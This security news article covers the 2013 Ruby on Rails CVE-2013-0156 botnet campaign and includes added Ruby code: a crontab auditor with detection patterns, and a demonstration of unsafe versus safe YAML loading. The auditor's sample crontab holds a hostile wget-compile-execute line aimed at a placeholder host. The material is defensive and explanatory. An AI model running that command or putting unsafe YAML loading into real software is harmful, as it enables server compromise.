Ruby on Rails exploit could hijack unpatched servers for botnet

Mohit Kumar, thehackernews.com, May 30, 2013, 4:53 p.m.

EPSS: 0.973 (High), percentile 99.9%

Server administrators are being urged to update their Ruby on Rails servers following the discovery of an active malware campaign targeting vulnerable versions of the web application framework.

According to security researcher Jeff Jarmoc, attackers are exploiting a known and patched vulnerability in the Ruby on Rails web framework to add an entry to the web server's crontab; the scheduled job downloads a file to the /tmp directory, where it is compiled and executed.

The exploit currently in use adds a custom cron job (a scheduled task on Linux machines) that executes a sequence of commands.

“Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers,” Jarmoc blogged. “There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.”
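The persistence step described above, a cron job that fetches a file into /tmp, compiles it and runs it, is something an administrator can look for directly. The following Ruby script is an added example written for this page, not code from the article or from Jarmoc's analysis. The regular expressions, the sample crontab and the host name example.invalid are constructed for illustration and model the described behaviour rather than the campaign's actual command.

```ruby
# Added example: audit crontab text for the persistence pattern the article
# describes (fetch into /tmp, compile there, execute from there).
# Patterns and sample data are constructed for illustration.

DOWNLOADERS = /\b(?:wget|curl|fetch)\b/
COMPILERS   = /\b(?:gcc|cc|tcc|clang)\b/
TMP_PATH    = %r{/tmp/\S+}
# A /tmp path at the start of the command or right after a separator (; & |)
# is being executed, not merely written to.
TMP_EXEC    = %r{(?:\A|[;&|]\s*)/tmp/\S+}

# Parse one crontab line into its schedule and command.
# Returns nil for blank lines, comments and environment settings (MAILTO=...).
def parse_cron_line(line)
  stripped = line.strip
  return nil if stripped.empty? || stripped.start_with?('#')
  if stripped.start_with?('@')
    # @reboot, @daily, ... occupy a single schedule field.
    schedule, command = stripped.split(/\s+/, 2)
  else
    fields = stripped.split(/\s+/, 6)
    return nil if fields.size < 6
    schedule = fields[0, 5].join(' ')
    command  = fields[5]
  end
  return nil if command.nil? || command.empty?
  { schedule: schedule, command: command }
end

# Reasons a command looks like the download-compile-execute chain.
def suspicious_reasons(command)
  reasons = []
  reasons << 'downloads into /tmp' if command =~ DOWNLOADERS && command =~ TMP_PATH
  reasons << 'compiles in /tmp'    if command =~ COMPILERS   && command =~ TMP_PATH
  reasons << 'executes from /tmp'  if command =~ TMP_EXEC
  reasons
end

# Walk a crontab and return every entry with at least one reason.
def audit_crontab(text)
  findings = []
  text.each_line.with_index(1) do |line, n|
    entry = parse_cron_line(line)
    next if entry.nil?
    reasons = suspicious_reasons(entry[:command])
    next if reasons.empty?
    findings << { line: n, schedule: entry[:schedule], command: entry[:command], reasons: reasons }
  end
  findings
end

# Constructed sample crontab (not a captured artefact): two benign jobs and
# one modelled on the article's description of the malicious entry.
SAMPLE_CRONTAB = <<~CRON
  # constructed sample, not a captured crontab
  MAILTO=root
  0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
  @daily /usr/bin/certbot renew --quiet
  */5 * * * * wget -q -O /tmp/build.c http://example.invalid/build.c; gcc -o /tmp/build /tmp/build.c; /tmp/build
CRON

if __FILE__ == $PROGRAM_NAME
  audit_crontab(SAMPLE_CRONTAB).each do |f|
    puts "line #{f[:line]} (#{f[:schedule]}): #{f[:reasons].join(', ')}"
    puts "  #{f[:command]}"
  end
end
```

Feed `audit_crontab` the output of `crontab -l` for each account and the contents of /etc/crontab and /etc/cron.d. System crontab lines carry an extra user field between the schedule and the command, so the sixth field there begins with the user name; the command patterns still match on the rest of the line. A hit is a lead, not a verdict: a legitimate build job can also compile in /tmp, so review each flagged entry by hand.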

The original flaw, disclosed as CVE-2013-0156, is in the Ruby on Rails code that processes request parameters: the XML parameter parser would deserialize embedded YAML, letting a request instantiate arbitrary Ruby objects.

Using this flaw, attackers download a malicious C source file from a remote server, compile it locally and execute it. The resulting malware is a bot that connects to an IRC (Internet Relay Chat) server and joins a predefined channel, where it waits for commands from the attackers.
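To show why a parameter-parsing flaw can end in remote code execution, the following Ruby snippet, added here and not taken from the article, contrasts unsafe and safe YAML loading of an attacker-controlled string. CVE-2013-0156 arose because the Rails XML parameter parser handed embedded YAML to a full YAML load, so a crafted parameter could instantiate arbitrary Ruby objects. The ServerConfig class and the parameter value below are hypothetical and constructed for the example.

```ruby
require 'yaml'

# Hypothetical application class; any class reachable on the load path
# could be instantiated the same way by an unsafe YAML load.
class ServerConfig
  attr_accessor :command
end

# Constructed attacker-controlled value, modelled on a request parameter
# that carries YAML. The !ruby/object tag asks the loader to allocate a
# ServerConfig and set its instance variables from the mapping.
UNTRUSTED_PARAM = <<~YAML
  --- !ruby/object:ServerConfig
  command: "echo attacker-controlled"
YAML

# What a vulnerable parameter parser effectively did: a full YAML load that
# honours object tags. Psych 4 made YAML.load safe by default and moved the
# old behaviour to YAML.unsafe_load, so both spellings are handled here.
def load_unsafely(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# The hardened form: safe_load only builds core types (strings, numbers,
# arrays, hashes) and rejects object tags with Psych::DisallowedClass.
# The exception is returned so the caller can see what was refused.
def load_safely(doc)
  YAML.safe_load(doc)
rescue Psych::DisallowedClass => e
  e
end

if __FILE__ == $PROGRAM_NAME
  obj = load_unsafely(UNTRUSTED_PARAM)
  puts "unsafe load built a #{obj.class} with command=#{obj.command.inspect}"
  puts "safe load refused it: #{load_safely(UNTRUSTED_PARAM).message}"
end
```

The unsafe path produces a live ServerConfig whose state the request chose; in a real application the object's class and the methods later called on it are what turn that into code execution. The safe path refuses the tag outright. The Rails advisory for CVE-2013-0156 also offered a stopgap for hosts that could not upgrade immediately: removing the 'yaml' and 'symbol' entries from ActiveSupport::XmlMini::PARSING so that XML parameters are never handed to the YAML loader.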

Users should update the Ruby on Rails installations on their servers to a version that contains the patch for this vulnerability (3.2.13 or later on the 3.2 branch). Because the campaign persists through cron, patching alone does not clean an already compromised host: also inspect the crontab entries and the /tmp directory on each server for scheduled jobs and files that were not put there by an administrator.